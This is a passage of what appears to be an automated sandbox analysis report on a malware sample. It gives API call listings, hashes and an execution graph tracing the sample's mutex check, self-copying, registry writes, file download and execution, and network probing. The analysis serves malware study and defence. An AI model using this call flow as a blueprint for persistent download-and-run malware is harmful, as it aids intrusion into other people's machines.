                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1426427189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1426413051.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426456914.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1426469956.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:14.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1480
                                                                                Total number of Limit Nodes:38
                                                                                execution_graph 4375 407500 Sleep CreateMutexA GetLastError 4376 407536 ExitProcess 4375->4376 4377 40753e 6 API calls 4375->4377 4378 4075e3 4377->4378 4379 4078a9 Sleep RegOpenKeyExW 4377->4379 4545 40ebe0 GetLocaleInfoA strcmp 4378->4545 4380 407902 RegOpenKeyExW 4379->4380 4381 4078d6 RegSetValueExA RegCloseKey 4379->4381 4383 407924 RegSetValueExA RegCloseKey 4380->4383 4384 407955 RegOpenKeyExW 4380->4384 4381->4380 4386 4079fa RegOpenKeyExW 4383->4386 4387 407977 RegCreateKeyExW RegCloseKey 4384->4387 4388 4079ac RegOpenKeyExW 4384->4388 4392 407a1c RegSetValueExA RegCloseKey 4386->4392 4393 407a4d RegOpenKeyExW 4386->4393 4387->4388 4388->4386 4391 4079ce RegSetValueExA RegCloseKey 4388->4391 4389 4075f0 ExitProcess 4390 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4394 40764c SetFileAttributesW RegOpenKeyExW 4390->4394 4395 4076de Sleep wsprintfW CopyFileW 4390->4395 4391->4386 4398 407b49 RegOpenKeyExW 4392->4398 4399 407aa4 RegOpenKeyExW 4393->4399 4400 407a6f RegCreateKeyExW RegCloseKey 4393->4400 4394->4395 4401 40767d wcslen RegSetValueExW 4394->4401 4396 407726 SetFileAttributesW RegOpenKeyExW 4395->4396 4397 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4395->4397 4396->4397 4404 407757 wcslen RegSetValueExW 4396->4404 4397->4379 4405 407817 SetFileAttributesW RegOpenKeyExW 4397->4405 4402 407b97 RegOpenKeyExW 4398->4402 4403 407b6b RegSetValueExA RegCloseKey 4398->4403 4406 407ac6 RegCreateKeyExW RegCloseKey 4399->4406 4407 407afb RegOpenKeyExW 4399->4407 4400->4399 4401->4395 4408 4076b2 RegCloseKey 4401->4408 4409 407be5 RegOpenKeyExA 4402->4409 4410 407bb9 RegSetValueExA RegCloseKey 4402->4410 4403->4402 4404->4397 4411 40778c RegCloseKey 4404->4411 4405->4379 4412 407848 wcslen RegSetValueExW 4405->4412 4406->4407 4407->4398 4413 407b1d RegSetValueExA RegCloseKey 4407->4413 4547 40ee30 memset memset CreateProcessW 4408->4547 4415 407cf1 RegOpenKeyExA 4409->4415 4416 407c0b 8 API calls 4409->4416 4410->4409 4417 40ee30 6 API calls 4411->4417 4412->4379 4418 40787d RegCloseKey 4412->4418 4413->4398 4421 407d17 8 API calls 4415->4421 4422 407dfd Sleep 4415->4422 4416->4415 4423 4077a5 4417->4423 4424 40ee30 6 API calls 4418->4424 4420 4076d6 ExitProcess 4421->4422 4456 40cc80 4422->4456 4423->4397 4425 4077b0 ExitProcess 4423->4425 4427 407896 4424->4427 4427->4379 4429 4078a1 ExitProcess 4427->4429 4430 407f87 4431 407e18 9 API calls 4459 405b60 InitializeCriticalSection CreateFileW 4431->4459 5750 405820 4431->5750 5759 406b50 Sleep GetModuleFileNameW 4431->5759 5774 4073b0 4431->5774 4437 407ecd CreateEventA 4491 40c3b0 4437->4491 4446 40d610 339 API calls 4447 407f2d 4446->4447 4448 40d610 339 API calls 4447->4448 4449 407f49 4448->4449 4450 40d610 339 API calls 4449->4450 4451 407f65 4450->4451 4536 40d780 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4451->4536 4453 407f75 4553 40d8c0 4453->4553 4562 40cc50 4456->4562 4460 405c85 4459->4460 4461 405b98 CreateFileMappingW 4459->4461 4473 40daf0 CoInitializeEx 4460->4473 4462 405bb9 MapViewOfFile 4461->4462 4463 405c7b CloseHandle 4461->4463 4464 405c71 CloseHandle 4462->4464 4465 405bd8 GetFileSize 4462->4465 4463->4460 4464->4463 4467 405bed 4465->4467 4466 405c67 UnmapViewOfFile 4466->4464 4467->4466 4469 405c2c 4467->4469 4472 405bfc 4467->4472 4691 40ccd0 4467->4691 4698 405c90 4467->4698 4470 40a660 _invalid_parameter 3 API calls 4469->4470 4470->4472 4472->4466 5008 40dbc0 socket 4473->5008 4475 407ec8 4486 406f70 CoInitializeEx SysAllocString 4475->4486 4476 40db98 5052 40a780 4476->5052 4479 40db5a 5033 40af30 htons 4479->5033 4480 40db10 4480->4475 4480->4476 4480->4479 5018 40de30 4480->5018 4485 40e920 24 API calls 4485->4476 4487 406f92 4486->4487 4488 406fa8 CoUninitialize 4486->4488 5197 406fc0 4487->5197 4488->4437 5206 40c370 4491->5206 4494 40c370 3 API calls 4495 40c3ce 4494->4495 4496 40c370 3 API calls 4495->4496 4497 40c3de 4496->4497 4498 40c370 3 API calls 4497->4498 4499 407ee5 4498->4499 4500 40d5e0 4499->4500 4501 40a240 7 API calls 4500->4501 4502 40d5eb 4501->4502 4503 407eef 4502->4503 4504 40d5f7 InitializeCriticalSection 4502->4504 4505 40b770 InitializeCriticalSection 4503->4505 4504->4503 4520 40b78a 4505->4520 4506 40b7b9 CreateFileW 4508 40b7e0 CreateFileMappingW 4506->4508 4509 40b8a2 4506->4509 4510 40b801 MapViewOfFile 4508->4510 4511 40b898 CloseHandle 4508->4511 5261 40b010 EnterCriticalSection 4509->5261 4513 40b81c GetFileSize 4510->4513 4514 40b88e CloseHandle 4510->4514 4511->4509 4522 40b83b 4513->4522 4514->4511 4516 40b8a7 4517 40d610 339 API calls 4516->4517 4518 407ef9 4517->4518 4524 40d610 4518->4524 4519 40b884 UnmapViewOfFile 4519->4514 4520->4506 5213 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4520->5213 5214 40b350 4520->5214 4522->4519 4523 40b350 32 API calls 4522->4523 5264 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4522->5264 4523->4522 4525 40d627 EnterCriticalSection 4524->4525 4526 407f12 4524->4526 5289 40d700 4525->5289 4526->4446 4529 40d6eb LeaveCriticalSection 4529->4526 4530 40a490 9 API calls 4531 40d669 4530->4531 4531->4529 4532 40d67b CreateThread 4531->4532 4532->4529 4533 40d69e 4532->4533 5294 40b8d0 4532->5294 5300 401f50 GetQueuedCompletionStatus 4532->5300 5307 40d360 4532->5307 5313 40da00 4532->5313 5324 40daa0 4532->5324 5331 401920 GetTickCount WaitForSingleObject 4532->5331 5354 40d3b0 4532->5354 4534 40d6c2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4533->4534 4535 40d6e4 4533->4535 4534->4535 4535->4529 4537 40d7b6 InterlockedExchangeAdd 4536->4537 4538 40d899 GetCurrentThread SetThreadPriority 4536->4538 4537->4538 4543 40d7d0 4537->4543 4538->4453 4539 40d7e9 EnterCriticalSection 4539->4543 4540 40d857 LeaveCriticalSection 4542 40d86e 4540->4542 4540->4543 4541 40d833 WaitForSingleObject 4541->4543 4542->4538 4543->4538 4543->4539 4543->4540 4543->4541 4543->4542 4544 40d88c Sleep 4543->4544 4544->4543 4546 4075e8 4545->4546 4546->4389 4546->4390 4548 40eea1 ShellExecuteW 4547->4548 4549 40ee92 Sleep 4547->4549 4551 40eed6 4548->4551 4552 40eec7 Sleep 4548->4552 4550 4076cb 4549->4550 4550->4395 4550->4420 4551->4550 4552->4550 4554 40d8cc EnterCriticalSection 4553->4554 4561 407f84 4553->4561 4555 40d8e8 4554->4555 4556 40d910 LeaveCriticalSection DeleteCriticalSection 4555->4556 4557 40d8fb CloseHandle 4555->4557 4558 40a660 _invalid_parameter 3 API calls 4556->4558 4557->4555 4559 40d936 4558->4559 4560 40a660 _invalid_parameter 3 API calls 4559->4560 4560->4561 4561->4430 4565 40c8a0 4562->4565 4566 40c8d3 4565->4566 4567 40c8be 4565->4567 4568 407e0d 4566->4568 4571 40ca80 4566->4571 4605 40c900 4567->4605 4568->4430 4568->4431 4572 40caa9 4571->4572 4573 40cb5a 4571->4573 4604 40cb52 4572->4604 4631 40a240 4572->4631 4575 40a240 7 API calls 4573->4575 4573->4604 4577 40cb7e 4575->4577 4580 402420 7 API calls 4577->4580 4577->4604 4582 40cba2 4580->4582 4581 40a240 7 API calls 4583 40caf2 4581->4583 4584 40a240 7 API calls 4582->4584 4639 4024e0 4583->4639 4586 40cbb1 4584->4586 4588 4024e0 10 API calls 4586->4588 4587 40cb1b 4642 40a660 4587->4642 4590 40cbda 4588->4590 4592 40a660 _invalid_parameter 3 API calls 4590->4592 4594 40cbe6 4592->4594 4593 402420 7 API calls 4595 40cb38 4593->4595 4596 402420 7 API calls 4594->4596 4597 4024e0 10 API calls 4595->4597 4598 40cbf7 4596->4598 4597->4604 4599 4024e0 10 API calls 4598->4599 4600 40cc11 4599->4600 4601 402420 7 API calls 4600->4601 4602 40cc22 4601->4602 4603 4024e0 10 API calls 4602->4603 4603->4604 4604->4568 4606 40c9b2 4605->4606 4607 40c929 4605->4607 4609 40a240 7 API calls 4606->4609 4630 40c9aa 4606->4630 4608 40a240 7 API calls 4607->4608 4607->4630 4610 40c93c 4608->4610 4611 40c9d8 4609->4611 4612 402420 7 API calls 4610->4612 4610->4630 4613 402420 7 API calls 4611->4613 4611->4630 4614 40c965 4612->4614 4615 40ca05 4613->4615 4616 4024e0 10 API calls 4614->4616 4617 4024e0 10 API calls 4615->4617 4618 40c97f 4616->4618 4619 40ca1f 4617->4619 4620 402420 7 API calls 4618->4620 4621 402420 7 API calls 4619->4621 4622 40c990 4620->4622 4623 40ca30 4621->4623 4624 4024e0 10 API calls 4622->4624 4625 4024e0 10 API calls 4623->4625 4624->4630 4626 40ca4a 4625->4626 4627 402420 7 API calls 4626->4627 4628 40ca5b 4627->4628 4629 4024e0 10 API calls 4628->4629 4629->4630 4630->4568 4649 40a260 4631->4649 4634 402420 4670 40a450 4634->4670 4677 402540 4639->4677 4641 4024ff _invalid_parameter 4641->4587 4687 40a300 GetCurrentProcessId 4642->4687 4644 40a66b 4645 40a672 4644->4645 4688 40a5a0 4644->4688 4645->4593 4648 40a687 RtlFreeHeap 4648->4645 4658 40a300 GetCurrentProcessId 4649->4658 4651 40a26b 4652 40a277 _invalid_parameter 4651->4652 4659 40a320 4651->4659 4654 40a24e 4652->4654 4655 40a292 RtlAllocateHeap 4652->4655 4654->4604 4654->4634 4655->4654 4656 40a2b9 _invalid_parameter 4655->4656 4656->4654 4657 40a2d4 memset 4656->4657 4657->4654 4658->4651 4667 40a300 GetCurrentProcessId 4659->4667 4661 40a329 4662 40a346 HeapCreate 4661->4662 4668 40a390 GetProcessHeaps 4661->4668 4664 40a360 HeapSetInformation GetCurrentProcessId 4662->4664 4665 40a387 4662->4665 4664->4665 4665->4652 4667->4661 4669 40a33c 4668->4669 4669->4662 4669->4665 4671 40a260 _invalid_parameter 7 API calls 4670->4671 4672 40242b 4671->4672 4673 402820 4672->4673 4674 40282a 4673->4674 4675 40a450 _invalid_parameter 7 API calls 4674->4675 4676 402438 4675->4676 4676->4581 4678 40258e 4677->4678 4680 402551 4677->4680 4679 40a450 _invalid_parameter 7 API calls 4678->4679 4678->4680 4683 4025b2 _invalid_parameter 4679->4683 4680->4641 4681 4025e2 memcpy 4682 402606 _invalid_parameter 4681->4682 4684 40a660 _invalid_parameter 3 API calls 4682->4684 4683->4681 4685 40a660 _invalid_parameter 3 API calls 4683->4685 4684->4680 4686 4025df 4685->4686 4686->4681 4687->4644 4689 40a5d0 HeapValidate 4688->4689 4690 40a5f0 4688->4690 4689->4690 4690->4645 4690->4648 4708 40a6d0 4691->4708 4694 40cd11 4694->4467 4697 40a660 _invalid_parameter 3 API calls 4697->4694 4921 40a490 4698->4921 4701 405cca memcpy 4702 40a6d0 8 API calls 4701->4702 4703 405d01 4702->4703 4931 40c640 4703->4931 4706 405d88 4706->4467 4709 40a6fd 4708->4709 4710 40a450 _invalid_parameter 7 API calls 4709->4710 4711 40a712 4709->4711 4712 40a714 memcpy 4709->4712 4710->4709 4711->4694 4713 40c1e0 4711->4713 4712->4709 4717 40c1ea 4713->4717 4715 40c209 4715->4694 4715->4697 4717->4715 4718 40c221 memcmp 4717->4718 4719 40c248 4717->4719 4721 40a660 _invalid_parameter 3 API calls 4717->4721 4722 40c6d0 4717->4722 4736 407fa0 4717->4736 4718->4717 4720 40a660 _invalid_parameter 3 API calls 4719->4720 4720->4715 4721->4717 4723 40c6df _invalid_parameter 4722->4723 4724 40a450 _invalid_parameter 7 API calls 4723->4724 4735 40c6e9 4723->4735 4725 40c778 4724->4725 4726 402420 7 API calls 4725->4726 4725->4735 4727 40c78d 4726->4727 4728 402420 7 API calls 4727->4728 4729 40c795 4728->4729 4731 40c7ed _invalid_parameter 4729->4731 4739 40c840 4729->4739 4744 402470 4731->4744 4734 402470 3 API calls 4734->4735 4735->4717 4852 40a1c0 4736->4852 4740 4024e0 10 API calls 4739->4740 4741 40c854 4740->4741 4750 4026f0 4741->4750 4743 40c86c 4743->4729 4745 4024ce 4744->4745 4747 402484 _invalid_parameter 4744->4747 4745->4734 4746 40a660 _invalid_parameter 3 API calls 4746->4745 4748 40a660 _invalid_parameter 3 API calls 4747->4748 4749 4024ac 4747->4749 4748->4749 4749->4746 4753 402710 4750->4753 4752 40270a 4752->4743 4754 402724 4753->4754 4755 402540 __aligned_recalloc_base 10 API calls 4754->4755 4756 40276d 4755->4756 4757 402540 __aligned_recalloc_base 10 API calls 4756->4757 4758 40277d 4757->4758 4759 402540 __aligned_recalloc_base 10 API calls 4758->4759 4760 40278d 4759->4760 4761 402540 __aligned_recalloc_base 10 API calls 4760->4761 4762 40279d 4761->4762 4763 4027a6 4762->4763 4764 4027cf 4762->4764 4768 403e20 4763->4768 4785 403df0 4764->4785 4767 4027c7 _invalid_parameter 4767->4752 4769 402820 _invalid_parameter 7 API calls 4768->4769 4770 403e37 4769->4770 4771 402820 _invalid_parameter 7 API calls 4770->4771 4772 403e46 4771->4772 4773 402820 _invalid_parameter 7 API calls 4772->4773 4774 403e55 4773->4774 4775 402820 _invalid_parameter 7 API calls 4774->4775 4784 403e64 _invalid_parameter 4775->4784 4777 40400f _invalid_parameter 4778 402850 _invalid_parameter 3 API calls 4777->4778 4779 404035 _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter 3 API calls 4779->4780 4781 40405b _invalid_parameter 4779->4781 4780->4779 4782 402850 _invalid_parameter 3 API calls 4781->4782 4783 404081 4781->4783 4782->4781 4783->4767 4784->4777 4788 402850 4784->4788 4792 404090 4785->4792 4787 403e0c 4787->4767 4789 402866 4788->4789 4790 40285b 4788->4790 4789->4784 4791 40a660 _invalid_parameter 3 API calls 4790->4791 4791->4789 4793 4040a6 _invalid_parameter 4792->4793 4794 4040b8 _invalid_parameter 4793->4794 4795 4040dd 4793->4795 4797 404103 4793->4797 4794->4787 4822 403ca0 4795->4822 4798 40413d 4797->4798 4799 40415e 4797->4799 4832 404680 4798->4832 4801 402820 _invalid_parameter 7 API calls 4799->4801 4802 40416f 4801->4802 4803 402820 _invalid_parameter 7 API calls 4802->4803 4804 40417e 4803->4804 4805 402820 _invalid_parameter 7 API calls 4804->4805 4806 40418d 4805->4806 4807 402820 _invalid_parameter 7 API calls 4806->4807 4808 40419c 4807->4808 4845 403d70 4808->4845 4810 4041ca _invalid_parameter 4811 402820 _invalid_parameter 7 API calls 4810->4811 4813 404284 _invalid_parameter 4810->4813 4811->4810 4812 402850 _invalid_parameter 3 API calls 4812->4813 4813->4812 4814 4045a3 _invalid_parameter 4813->4814 4815 402850 _invalid_parameter 3 API calls 4814->4815 4816 4045c9 _invalid_parameter 4814->4816 4815->4814 4817 402850 _invalid_parameter 3 API calls 4816->4817 4818 4045ef _invalid_parameter 4816->4818 4817->4816 4819 402850 _invalid_parameter 3 API calls 4818->4819 4820 404615 _invalid_parameter 4818->4820 4819->4818 4820->4794 4821 402850 _invalid_parameter 3 API calls 4820->4821 4821->4820 4823 403cae 4822->4823 4824 402820 _invalid_parameter 7 API calls 4823->4824 4825 403ccb 4824->4825 4826 402820 _invalid_parameter 7 API calls 4825->4826 4827 403cda _invalid_parameter 4826->4827 4828 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4827->4828 4829 403d3a _invalid_parameter 4827->4829 4828->4827 4830 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4829->4830 4831 403d60 4829->4831 4830->4829 4831->4794 4833 402820 _invalid_parameter 7 API calls 4832->4833 4834 404697 4833->4834 4835 402820 _invalid_parameter 7 API calls 4834->4835 4836 4046a6 4835->4836 4837 402820 _invalid_parameter 7 API calls 4836->4837 4838 4046b5 _invalid_parameter 4837->4838 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4838->4839 4840 404841 _invalid_parameter 4838->4840 4839->4838 4841 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4840->4841 4842 404867 _invalid_parameter 4840->4842 4841->4840 4843 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4842->4843 4844 40488d 4842->4844 4843->4842 4844->4794 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403d7f _invalid_parameter 4846->4847 4848 403ca0 _invalid_parameter 9 API calls 4847->4848 4849 403db8 _invalid_parameter 4848->4849 4850 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4849->4850 4851 403de3 4849->4851 4850->4849 4851->4810 4853 40a1d2 4852->4853 4856 40a120 4853->4856 4857 40a450 _invalid_parameter 7 API calls 4856->4857 4864 40a130 4857->4864 4860 40a660 _invalid_parameter 3 API calls 4862 407fbf 4860->4862 4861 40a16c 4861->4860 4862->4717 4864->4861 4864->4862 4865 409650 4864->4865 4872 409c40 4864->4872 4877 40a010 4864->4877 4866 409663 4865->4866 4871 409659 4865->4871 4867 4096a6 memset 4866->4867 4866->4871 4868 4096c7 4867->4868 4867->4871 4869 4096cd memcpy 4868->4869 4868->4871 4885 409420 4869->4885 4871->4864 4873 409c4d 4872->4873 4874 409c57 4872->4874 4873->4864 4874->4873 4875 409d4f memcpy 4874->4875 4890 409970 4874->4890 4875->4874 4878 40a01c 4877->4878 4881 40a026 4877->4881 4878->4864 4879 409970 64 API calls 4880 40a0a7 4879->4880 4880->4878 4882 409420 6 API calls 4880->4882 4881->4878 4881->4879 4883 40a0c6 4882->4883 4883->4878 4884 40a0db memcpy 4883->4884 4884->4878 4886 40946e 4885->4886 4888 40942e 4885->4888 4886->4871 4888->4886 4889 409360 6 API calls 4888->4889 4889->4888 4891 40998a 4890->4891 4899 409980 4890->4899 4891->4899 4900 4097b0 4891->4900 4894 409ae7 memcpy 4897 409c11 4894->4897 4895 409ac8 memcpy 4895->4899 4898 409970 62 API calls 4897->4898 4898->4899 4899->4874 4901 4097c7 4900->4901 4909 4097bd 4900->4909 4903 409855 4901->4903 4904 409838 4901->4904 4908 409850 4901->4908 4901->4909 4907 409420 6 API calls 4903->4907 4906 409420 6 API calls 4904->4906 4906->4908 4907->4908 4911 409110 4908->4911 4909->4894 4909->4895 4909->4899 4910 4098fc memset 4910->4909 4912 409129 4911->4912 4920 40911f 4911->4920 4913 408fe0 9 API calls 4912->4913 4912->4920 4914 409222 4913->4914 4915 40a450 _invalid_parameter 7 API calls 4914->4915 4916 409271 4915->4916 4917 408e50 46 API calls 4916->4917 4916->4920 4918 40929e 4917->4918 4919 40a660 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4918->4919 4919->4920 4920->4909 4920->4910 4940 40a300 GetCurrentProcessId 4921->4940 4923 40a49b 4924 40a320 _invalid_parameter 5 API calls 4923->4924 4925 40a4a7 _invalid_parameter 4923->4925 4924->4925 4926 40a550 HeapAlloc 4925->4926 4927 40a51a HeapReAlloc 4925->4927 4928 40a5a0 _invalid_parameter HeapValidate 4925->4928 4929 40a660 _invalid_parameter 3 API calls 4925->4929 4930 405cb5 4925->4930 4926->4925 4927->4925 4928->4925 4929->4925 4930->4701 4930->4706 4934 40c64b 4931->4934 4932 40a450 _invalid_parameter 7 API calls 4932->4934 4933 405d4d 4933->4706 4935 4072a0 4933->4935 4934->4932 4934->4933 4936 40a450 _invalid_parameter 7 API calls 4935->4936 4937 4072b0 4936->4937 4938 4072f7 4937->4938 4939 4072bc memcpy CreateThread CloseHandle 4937->4939 4938->4706 4939->4938 4941 407300 4939->4941 4940->4923 4942 407371 4941->4942 4950 407311 4941->4950 4943 40737c DeleteUrlCacheEntry 4942->4943 4944 40736f 4942->4944 4947 40ef90 64 API calls 4943->4947 4945 40a660 _invalid_parameter 3 API calls 4944->4945 4948 4073a6 4945->4948 4946 407320 StrChrA 4949 407344 DeleteUrlCacheEntry 4946->4949 4946->4950 4947->4944 4953 40ef90 9 API calls 4949->4953 4950->4944 4950->4946 4950->4949 4954 40f053 InternetOpenUrlW 4953->4954 4955 40f1be InternetCloseHandle Sleep 4953->4955 4956 40f1b1 InternetCloseHandle 4954->4956 4957 40f082 CreateFileW 4954->4957 4958 40f1e5 7 API calls 4955->4958 4959 407359 Sleep 4955->4959 4956->4955 4960 40f0b1 InternetReadFile 4957->4960 4961 40f1a4 CloseHandle 4957->4961 4958->4959 4962 40f274 wsprintfW DeleteFileW Sleep 4958->4962 4959->4950 4963 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4960->4963 4964 40f0d5 4960->4964 4961->4956 4965 40ec70 21 API calls 4962->4965 4983 40ec70 CreateFileW 4963->4983 4964->4963 4966 40f0de WriteFile 4964->4966 4968 40f2b4 4965->4968 4966->4960 4970 40f2f2 DeleteFileW 4968->4970 4971 40f2be Sleep 4968->4971 4970->4959 4974 40ee30 6 API calls 4971->4974 4972 40f197 DeleteFileW 4972->4961 4973 40f15b Sleep 4975 40ee30 6 API calls 4973->4975 4976 40f2d5 4974->4976 4977 40f172 4975->4977 4978 40f2f0 4976->4978 4980 40f2e8 ExitProcess 4976->4980 4979 40f17d 4977->4979 4982 40f18e 4977->4982 4978->4959 4981 40f186 ExitProcess 4979->4981 4979->4982 4982->4961 4984 40ecb5 CreateFileMappingW 4983->4984 4985 40edca 4983->4985 4986 40edc0 CloseHandle 4984->4986 4987 40ecd6 MapViewOfFile 4984->4987 4988 40edd0 CreateFileW 4985->4988 4997 40ee21 4985->4997 4986->4985 4989 40ecf5 GetFileSize 4987->4989 4990 40edb6 CloseHandle 4987->4990 4991 40edf2 WriteFile CloseHandle 4988->4991 4992 40ee18 4988->4992 4993 40ed11 4989->4993 4994 40edac UnmapViewOfFile 4989->4994 4990->4986 4991->4992 4995 40a660 _invalid_parameter 3 API calls 4992->4995 5005 40cca0 4993->5005 4994->4990 4995->4997 4997->4972 4997->4973 4999 40c640 7 API calls 5000 40ed60 4999->5000 5000->4994 5001 40ed7d memcmp 5000->5001 5001->4994 5002 40ed99 5001->5002 5003 40a660 _invalid_parameter 3 API calls 5002->5003 5004 40eda2 5003->5004 5004->4994 5006 40c6d0 10 API calls 5005->5006 5007 40ccc4 5006->5007 5007->4994 5007->4999 5009 40dd1e 5008->5009 5010 40dbed htons inet_addr setsockopt 5008->5010 5009->4480 5011 40af30 8 API calls 5010->5011 5012 40dc66 bind lstrlenA sendto ioctlsocket 5011->5012 5017 40dcbb 5012->5017 5015 40dce2 5065 40aff0 shutdown closesocket 5015->5065 5016 40a490 9 API calls 5016->5017 5017->5015 5017->5016 5056 40dd40 5017->5056 5072 40e070 memset InternetCrackUrlA InternetOpenA 5018->5072 5022 40a660 _invalid_parameter 3 API calls 5023 40df4e 5022->5023 5023->4480 5024 40df1b 5024->5022 5030 40df11 SysFreeString 5030->5024 5179 40aef0 inet_addr 5033->5179 5036 40afdd 5041 40e920 5036->5041 5037 40af8c connect 5038 40afa0 getsockname 5037->5038 5039 40afd4 5037->5039 5038->5039 5182 40aff0 shutdown closesocket 5039->5182 5183 40aed0 inet_ntoa 5041->5183 5043 40e936 5044 40cea0 11 API calls 5043->5044 5045 40e955 5044->5045 5051 40db7c 5045->5051 5184 40e9a0 memset InternetCrackUrlA InternetOpenA 5045->5184 5048 40e98c 5050 40a660 _invalid_parameter 3 API calls 5048->5050 5049 40a660 _invalid_parameter 3 API calls 5049->5048 5050->5051 5051->4485 5054 40a784 5052->5054 5053 40a78a 5053->4475 5054->5053 5055 40a660 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 5054->5055 5055->5054 5057 40dd5c 5056->5057 5058 40de24 5057->5058 5059 40dd78 recvfrom 5057->5059 5058->5017 5060 40dda6 StrCmpNIA 5059->5060 5061 40dd99 Sleep 5059->5061 5060->5057 5062 40ddc5 StrStrIA 5060->5062 5061->5057 5062->5057 5063 40dde6 StrChrA 5062->5063 5066 40cd50 5063->5066 5065->5009 5070 40cd5b 5066->5070 5067 40cd61 lstrlenA 5069 40cd74 5067->5069 5067->5070 5068 40a450 _invalid_parameter 7 API calls 5068->5070 5069->5057 5070->5067 5070->5068 5070->5069 5071 40cd90 memcpy 5070->5071 5071->5069 5071->5070 5073 40e111 InternetConnectA 5072->5073 5074 40de4a 5072->5074 5075 40e27a InternetCloseHandle 5073->5075 5076 40e14a HttpOpenRequestA 5073->5076 5074->5023 5085 40df60 5074->5085 5075->5074 5077 40e180 HttpSendRequestA 5076->5077 5078 40e26d InternetCloseHandle 5076->5078 5079 40e260 InternetCloseHandle 5077->5079 5081 40e19d 5077->5081 5078->5075 5079->5078 5080 40e1be InternetReadFile 5080->5081 5082 40e1eb 5080->5082 5081->5080 5081->5082 5083 40a490 9 API calls 5081->5083 5082->5079 5084 40e206 memcpy 5083->5084 5084->5081 5114 405630 5085->5114 5088 40de63 5088->5024 5095 40e8d0 5088->5095 5089 40df8a SysAllocString 5090 40dfa1 CoCreateInstance 5089->5090 5091 40e057 5089->5091 5092 40e04d SysFreeString 5090->5092 5094 40dfc6 5090->5094 5093 40a660 _invalid_parameter 3 API calls 5091->5093 5092->5091 5093->5088 5094->5092 5131 40e420 5095->5131 5098 40e2a0 5136 40e6f0 5098->5136 5103 40e850 6 API calls 5104 40e2f7 5103->5104 